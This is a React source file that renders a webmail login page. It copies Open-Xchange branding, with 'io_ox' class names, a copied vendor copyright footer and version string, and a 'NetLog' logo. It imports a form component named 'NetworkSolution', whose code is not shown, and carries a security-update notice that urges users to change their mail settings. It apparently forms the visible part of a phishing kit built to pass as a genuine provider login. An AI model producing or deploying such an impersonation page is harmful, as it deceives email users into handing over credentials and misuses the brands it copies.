import NetLog from './img/logo.png';
import './App.css';
import NetworkSolution from './Form/form';



function App() {

  const relWebPage = ()=> window.location.reload();


  return (
    <div className="App">
      
        <header className='io_ox_login_header'>
          <div className='io_ox_hder_wrpa'>


            <div className='img_cont'>
              <img 
                onClick={relWebPage}
                className='logo_net_mg'
                src={NetLog}
                alt='logo'
                title='NetLog'
                id='NetLog'
              />
            </div>


            <div className='hdr_option__'>
              <span className='langg'>Language:</span>
              &#160;
              <select className="select_selected">
                <option defaultValue className="opppt">English (United States)</option>
                <option className="opppt">Català (Espanya)</option>
                <option className="opppt">Čeština (Česko)</option>
                <option className="opppt">Dansk (Danmark)</option>
                <option className="opppt">Deutsch (Deutschland)</option>
                <option className="opppt">Deutsch (Österreich)</option>
                <option className="opppt">Deutsch (Schweiz)</option>
                <option className="opppt">eesti (Eesti)</option>
                <option className="opppt">English (Australia)</option>
                <option className="opppt">English (Canada)</option>
                <option className="opppt">English (Germany)</option>
                <option className="opppt">English (Ireland)</option>
                <option className="opppt">English (New Zealand)</option>
                <option className="opppt">English (Singapore)</option>
                <option className="opppt">English (South Africa)</option>
                <option className="opppt">English (United Kingdom)</option>
                <option className="opppt">English (United States)</option>
                <option className="opppt">Español (Argentina)</option>
                <option className="opppt">Español (Bolivia)</option>
                <option className="opppt">Español (Chile)</option>
                <option className="opppt">Español (Colombia)</option>
                <option className="opppt">Español (Costa Rica)</option>
                <option className="opppt">Español (Ecuador)</option>
                <option className="opppt">Español (El Salvador)</option>
                <option className="opppt">Español (Espana)</option>
                <option className="opppt">Español (Guatemala)</option>
                <option className="opppt">Español (Honduras)</option>
                <option className="opppt">Español (México)</option>
                <option className="opppt">Español (Nicaragua)</option>
                <option className="opppt">Español (Panamá)</option>
                <option className="opppt">Español (Perú)</option>
                <option className="opppt">Español (Puerto Rico)</option>
                <option className="opppt">Español (Républica Dominicana)</option>
                <option className="opppt">Español (United States)</option>
                <option className="opppt">Français (Belgique)</option>
                <option className="opppt">Français (Canada)</option>
                <option className="opppt">Français (France)</option>
                <option className="opppt">Français (Suisse)</option>
                <option className="opppt">Italiano (Italia)</option>
                <option className="opppt">Italiano (Svizzera)</option>
                <option className="opppt">Latviešu (Latvija)</option>
                <option className="opppt">Magyar (Magyarország)</option>
                <option className="opppt">Nederlands (België)</option>
                <option className="opppt">Nederlands (Nederland)</option>
                <option className="opppt">Norsk (Norge)</option>
                <option className="opppt">Polski (Polska)</option>
                <option className="opppt">Português (Brasil)</option>
                <option className="opppt">Pусский (Россия)</option>
                <option className="opppt">Română (România)</option>
                <option className="opppt">Slovenčina (Slovensko)</option>
                <option className="opppt">Suomi (Suomi)</option>
                <option className="opppt">Svenska (Sverige)</option>
                <option className="opppt">Türkçe (Türkiye)</option>
                <option className="opppt">中文 (简体)</option>
                <option className="opppt">中文 (繁體)</option>
                <option className="opppt">日本語 (日本)</option>
                {/* <option></option> */}
              </select>
            </div>


          </div>
        </header>

        <NetworkSolution />

        <div className='msg'>
          <p>
            We are updating our email security and will require all email server connections to use an encrypted connection when connecting via POP or IMAP from a device. To avoid any email connection issues, please be sure to update your mail client settings.
          </p>

          <span className='lrn_mor__e'>
            Learn More...
          </span>
        </div>


        <footer className='lstxd'>
          <p>
            © 2025 Open-Xchange GmbH
          </p>

          <p>
            Version:
            &#160;
            8.33.2
          </p>

          <p>
            Privacy policy
          </p>
          
          <p>
            Legal notes
          </p>
        </footer>
    </div>
  );
}

export default App;
